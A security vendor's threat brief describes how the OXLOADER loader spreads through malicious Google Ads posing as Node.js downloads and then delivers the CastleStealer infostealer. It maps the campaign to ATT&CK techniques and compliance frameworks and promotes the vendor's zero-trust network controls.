How does the OXLOADER campaign operate?

The campaign uses malicious Google Ads to redirect users to a fake website, which delivers a batch script hosted on Storj. This script downloads and executes OXLOADER, which then deploys CastleStealer to exfiltrate sensitive information.

What measures can organizations take to protect against such threats?

Organizations should implement advanced threat detection systems, educate users about the risks of clicking on sponsored search results, and monitor network traffic for signs of malicious activity.

OXLOADER Exploits Google Ads to Distribute CastleStealer Malware

A new malware loader, OXLOADER, leverages malicious Google Ads to deliver the CastleStealer infostealer, employing sophisticated obfuscation techniques to evade detection.

Published: June 22, 2026

Share this on:

Executive Summary

In June 2026, cybersecurity researchers identified a new malware loader named OXLOADER, which is being used to distribute the CastleStealer infostealer. The campaign begins with malicious Google Ads that redirect users searching for 'lts version of node.js' to a counterfeit website. This site delivers a batch script hosted on Storj, which, when executed, downloads and runs OXLOADER. OXLOADER employs advanced obfuscation techniques and anti-analysis measures to evade detection, ultimately deploying CastleStealer to exfiltrate sensitive information from infected systems.

This incident underscores the evolving tactics of threat actors who exploit legitimate services like Google Ads and Storj to distribute malware. The sophisticated obfuscation and anti-analysis methods used by OXLOADER highlight the increasing complexity of malware designed to bypass traditional security measures, posing significant challenges for detection and mitigation.

Why This Matters Now

The OXLOADER campaign exemplifies the growing trend of cybercriminals leveraging legitimate platforms to disseminate malware, making detection more challenging. Organizations must enhance their security protocols to address these sophisticated attack vectors and protect sensitive data from emerging threats.

Attack Path Analysis

The attack began with malicious Google Ads leading users to a fake Node.js download page, resulting in the download and execution of OXLOADER, which then deployed CASTLESTEALER to exfiltrate sensitive data.

Kill Chain Progression

Initial Compromise

High

Privilege Escalation

Medium

Lateral Movement

Lowinferred

Command & Control

Medium

Exfiltration

Medium

Impact

Medium

Initial Compromise

Description

Users were lured through malicious Google Ads to a counterfeit Node.js download site, leading to the download and execution of OXLOADER.

Confidence:

High

MITRE ATT&CK® Techniques

Command and Control

T1071.001

Application Layer Protocol: Web Protocols

Persistence

T1547.001

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Execution

T1059.003

Command and Scripting Interpreter: Windows Command Shell

Defense Evasion

T1036

Masquerading

Defense Evasion

T1140

Deobfuscate/Decode Files or Information

Potential Compliance Exposure

Mapping incident impact across multiple compliance frameworks.

PCI DSS 4.0 – Ensure all system components are protected from known vulnerabilities

Control ID: 6.2

The use of malicious loaders like OXLOADER to deliver malware such as CastleStealer indicates a failure to protect system components from known vulnerabilities, potentially leading to unauthorized access and data breaches.

NYDFS 23 NYCRR 500 – Cybersecurity Policy

Control ID: 500.03

The incident suggests inadequacies in the organization's cybersecurity policy, particularly in preventing the execution of unauthorized software and mitigating phishing attacks through malicious ads.

DORA – ICT Risk Management Framework

Control ID: Article 5

The exploitation of malicious Google Ads to distribute malware highlights deficiencies in the ICT risk management framework, emphasizing the need for robust controls against social engineering and malware delivery mechanisms.

CISA ZTMM 2.0 – Identity and Access Management

Control ID: 3.1

The successful deployment of CastleStealer via OXLOADER points to weaknesses in identity and access management, allowing unauthorized code execution and potential data exfiltration.

NIS2 Directive – Cybersecurity Risk Management Measures

Control ID: Article 21

The incident underscores the need for enhanced cybersecurity risk management measures to detect and prevent the use of malicious loaders and infostealers, ensuring the integrity and confidentiality of data.

Sector Implications

Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.

Financial Services

OXLOADER's infostealer capabilities targeting financial credentials through malicious Google Ads pose severe risks to banking operations and customer data protection.

Marketing/Advertising/Sales

Malicious Google Ads campaign exploiting advertising platforms creates direct attack vectors against marketing professionals managing digital advertising campaigns and budgets.

Computer Software/Engineering

CastleStealer targeting software development environments threatens source code, credentials, and intellectual property through sophisticated loader mechanisms and encrypted traffic.

Health Care / Life Sciences

Infostealer malware compromising healthcare systems violates HIPAA compliance requirements while threatening patient data through east-west traffic and lateral movement.

Sources

New OXLOADER Loader Uses Malicious Google Ads to Deliver CastleStealerhttps://thehackernews.com/2026/06/new-oxloader-loader-uses-malicious.html
Verified

OXLOADER: new loader evading detection to drop infostealer — Elastic Security Labshttps://www.elastic.co/security-labs/oxloader-malware-loader-infostealer

Verified

ClickFix 'BackgroundFix' Campaign Delivers CastleLoader, NetSupport RAT, and CastleStealer – CraftedSignal Threat Feedhttps://feed.craftedsignal.io/briefs/2026-04-clickfix-backgroundfix/

Verified

Frequently Asked Questions

OXLOADER is a newly identified malware loader that uses advanced obfuscation and anti-analysis techniques to evade detection and deliver payloads like the CastleStealer infostealer.

Cloud Native Security Fabric Mitigations and ControlsCNSF

Aviatrix Zero Trust CNSF is pertinent to this incident as it could have limited the malware's ability to move laterally and exfiltrate data by enforcing strict segmentation and controlled egress policies.

Initial Compromise

Control: Cloud Native Security Fabric (CNSF)

Mitigation: The CNSF would likely have constrained the malware's ability to communicate with unauthorized external servers, reducing the risk of successful initial compromise.

Privilege Escalation

Control: Zero Trust Segmentation

Mitigation: Zero Trust Segmentation would likely have restricted the malware's access to sensitive resources, even with elevated privileges, thereby limiting its potential impact.

Lateral Movement

Control: East-West Traffic Security

Mitigation: East-West Traffic Security would likely have limited the malware's ability to move laterally, thereby reducing the risk of widespread infection.

Command & Control

Control: Multicloud Visibility & Control

Mitigation: Multicloud Visibility & Control would likely have detected and restricted unauthorized command and control communications, thereby limiting the malware's operational capabilities.

Exfiltration

Control: Egress Security & Policy Enforcement

Mitigation: Egress Security & Policy Enforcement would likely have restricted unauthorized data exfiltration, thereby reducing the risk of data loss.

Impact (Mitigations)

The implementation of CNSF controls would likely have reduced the overall impact by limiting unauthorized access and data exfiltration.

Impact at a Glance

Affected Business Functions

Software Development
IT Operations
Customer Support

Operational Disruption

Estimated downtime: 3 days

Financial Impact

Estimated loss: $50,000

Data Exposure

Potential exposure of sensitive customer data and internal credentials.

Recommended Actions

• Implement Egress Security & Policy Enforcement to restrict unauthorized outbound traffic and prevent data exfiltration.
• Deploy Inline IPS (Suricata) to detect and block known exploit patterns and malicious payloads.
• Utilize Cloud Firewall (ACF) to control and monitor outbound connections, reducing the risk of command and control communications.
• Enhance Threat Detection & Anomaly Response capabilities to identify and respond to suspicious activities promptly.
• Apply Zero Trust Segmentation to limit lateral movement within the network by enforcing least privilege access controls.

Secure the Paths Between Cloud Workloads

A cloud-native security fabric that enforces Zero Trust across workload communication—reducing attack paths, compliance risk, and operational complexity.

Stop Advanced Threats Get a Free Workload Attack Path Assessment Under Active Attack?

OXLOADER Exploits Google Ads to Distribute CastleStealer Malware

Executive Summary

Why This Matters Now

Attack Path Analysis

Kill Chain Progression

Initial Compromise

Description

MITRE ATT&CK® Techniques

Application Layer Protocol: Web Protocols

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Command and Scripting Interpreter: Windows Command Shell

Masquerading

Deobfuscate/Decode Files or Information

Potential Compliance Exposure

PCI DSS 4.0 – Ensure all system components are protected from known vulnerabilities

NYDFS 23 NYCRR 500 – Cybersecurity Policy

DORA – ICT Risk Management Framework

CISA ZTMM 2.0 – Identity and Access Management

NIS2 Directive – Cybersecurity Risk Management Measures

Sector Implications

Financial Services

Marketing/Advertising/Sales

Computer Software/Engineering

Health Care / Life Sciences

Sources

Frequently Asked Questions

Cloud Native Security Fabric Mitigations and ControlsCNSF

Impact at a Glance

Affected Business Functions

Recommended Actions

Key Takeaways & Next Steps

Secure the Paths Between Cloud Workloads